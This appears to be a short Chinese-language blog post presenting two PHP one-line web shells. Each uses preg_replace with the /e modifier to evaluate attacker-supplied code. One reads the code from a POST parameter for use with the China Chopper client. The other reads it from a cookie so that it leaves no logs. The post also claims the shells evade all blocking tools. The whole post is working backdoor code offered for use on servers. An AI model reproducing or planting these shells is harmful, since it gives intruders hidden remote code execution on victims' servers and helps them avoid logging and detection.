/ PHP

有关PHP木马的一些东西

1.一句话木马

代码如下:

preg_replace("/leo/e",$_POST['pwd'],"leo");

使用密码pwd菜刀可以直连,原理是利用preg_replace函数中e参数(PREG_REPLACE_EVAL)

当使用e修饰符时, 这个函数会转义一些字符(即:*和NULL)然后进行后向引用替换. 当这些完成后请确保后向引用解析完后没有单引号或 双引号引起的语法错误(比如:‘strlen(\’$1\’)+strlen(“$2”)’*). 确保符合PHP的字符串语法, 并且符合eval语法. 因为在完成替换后, 引擎会将结果字符串作为php代码使用eval方式进行评估并将返回值作为最终参与替换的字符串.

应该是免杀所有拦截工具。

2.无日志木马

preg_replace("/leo/e",$_COOKIE['pwd'],"leo");

这个没有办法用菜刀直连,但是不会留下日志。

有关PHP木马的一些东西
Share this